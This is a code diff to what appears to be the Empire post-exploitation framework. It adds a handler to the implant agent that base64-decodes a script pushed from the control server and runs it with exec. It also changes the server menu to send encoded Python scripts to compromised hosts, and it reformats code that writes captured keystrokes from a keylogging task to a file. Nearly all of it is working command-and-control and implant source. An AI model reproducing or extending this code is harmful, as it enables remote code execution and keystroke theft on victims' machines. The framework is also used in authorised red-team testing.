diff --git a/data/agent/agent.py b/data/agent/agent.py index e84692f..d7e5a32 100644 --- a/data/agent/agent.py +++ b/data/agent/agent.py @@ -418,6 +418,21 @@ def process_packet(packetType, data, resultID): # TODO: implement job structure pass + elif packetType == 121: + #base64 decode the script and execute + script = base64.b64decode(data) + try: + buffer = StringIO() + sys.stdout = buffer + code_obj = compile(script, '', 'exec') + exec code_obj in globals() + sys.stdout = sys.__stdout__ + result = str(buffer.getvalue()) + return build_response_packet(121, result, resultID) + except Exception as e: + errorData = str(buffer.getvalue()) + return build_response_packet(0, "error executing specified Python data %s \nBuffer data recovered:\n%s" %(e, errorData), resultID) + elif packetType == 122: #base64 decode and decompress the data try: diff --git a/lib/common/agents.py b/lib/common/agents.py index 8b39b4e..a0d1a76 100644 --- a/lib/common/agents.py +++ b/lib/common/agents.py @@ -1343,19 +1343,19 @@ class Agents: if autorun and autorun[0] != '' and autorun[1] != '': self.add_agent_task_db(sessionID, autorun[0], autorun[1]) - if self.mainMenu.autoRuns.has_key(language.lower()) and len(self.mainMenu.autoRuns[language.lower()]) > 0: - autorunCmds = ["interact %s" % sessionID] - autorunCmds.extend(self.mainMenu.autoRuns[language.lower()]) - autorunCmds.extend(["lastautoruncmd"]) - self.mainMenu.resourceQueue.extend(autorunCmds) - try: - #this will cause the cmdloop() to start processing the autoruns - self.mainMenu.do_agents("kickit") - except Exception as e: - if e.message == "endautorun": - pass - else: - raise e + if self.mainMenu.autoRuns.has_key(language.lower()) and len(self.mainMenu.autoRuns[language.lower()]) > 0: + autorunCmds = ["interact %s" % sessionID] + autorunCmds.extend(self.mainMenu.autoRuns[language.lower()]) + autorunCmds.extend(["lastautoruncmd"]) + self.mainMenu.resourceQueue.extend(autorunCmds) + try: + #this will cause the cmdloop() to start processing the autoruns + self.mainMenu.do_agents("kickit") + except Exception as e: + if e.message == "endautorun": + pass + else: + raise e return "STAGE2: %s" % (sessionID) @@ -1509,7 +1509,7 @@ class Agents: """ agentSessionID = sessionID - keyLogTaskID = None + keyLogTaskID = None # see if we were passed a name instead of an ID nameid = self.get_agent_id_db(sessionID) @@ -1603,7 +1603,7 @@ class Agents: elif responseName == "TASK_EXIT": # exit command response - data = "[!] Agent %s exiting" % (sessionID) + data = "[!] Agent %s exiting" % (sessionID) # let everyone know this agent exited dispatcher.send(data, sender='Agents') @@ -1724,20 +1724,21 @@ class Agents: elif responseName == "TASK_CMD_JOB": #check if this is the powershell keylogging task, if so, write output to file instead of screen if keyLogTaskID and keyLogTaskID == taskID: - safePath = os.path.abspath("%sdownloads/" % self.mainMenu.installPath) - savePath = "%sdownloads/%s/keystrokes.txt" % (self.mainMenu.installPath,sessionID) - if not os.path.abspath(savePath).startswith(safePath): + safePath = os.path.abspath("%sdownloads/" % self.mainMenu.installPath) + savePath = "%sdownloads/%s/keystrokes.txt" % (self.mainMenu.installPath,sessionID) + if not os.path.abspath(savePath).startswith(safePath): dispatcher.send("[!] WARNING: agent %s attempted skywalker exploit!" % (self.sessionID), sender='Agents') return - with open(savePath,"a+") as f: - new_results = data.replace("\r\n","").replace("[SpaceBar]", "").replace('\b', '').replace("[Shift]", "").replace("[Enter]\r","\r\n") - f.write(new_results) - else: + + with open(savePath,"a+") as f: + new_results = data.replace("\r\n","").replace("[SpaceBar]", "").replace('\b', '').replace("[Shift]", "").replace("[Enter]\r","\r\n") + f.write(new_results) + else: # dynamic script output -> non-blocking self.update_agent_results_db(sessionID, data) - # update the agent log - self.save_agent_log(sessionID, data) + # update the agent log + self.save_agent_log(sessionID, data) # TODO: redo this regex for really large AD dumps # so a ton of data isn't kept in memory...? @@ -1802,6 +1803,7 @@ class Agents: self.save_agent_log(sessionID, data) elif responseName == "TASK_SCRIPT_COMMAND": + self.update_agent_results_db(sessionID, data) # update the agent log self.save_agent_log(sessionID, data) diff --git a/lib/common/empire.py b/lib/common/empire.py index db0ef29..e6960cc 100644 --- a/lib/common/empire.py +++ b/lib/common/empire.py @@ -21,6 +21,9 @@ import hashlib import time import fnmatch import shlex +import pkgutil +import importlib +import base64 # Empire imports import helpers @@ -2589,10 +2592,10 @@ class PythonAgentMenu(SubMenu): open_file.close() script = script.replace('\r\n', '\n') script = script.replace('\r', '\n') - + encScript = base64.b64encode(script) msg = "[*] Tasked agent to execute python script: "+filename print helpers.color(msg, color="green") - self.mainMenu.agents.add_agent_task_db(self.sessionID, "TASK_CMD_WAIT", script) + self.mainMenu.agents.add_agent_task_db(self.sessionID, "TASK_SCRIPT_COMMAND", encScript) #update the agent log self.mainMenu.agents.save_agent_log(self.sessionID, msg) else: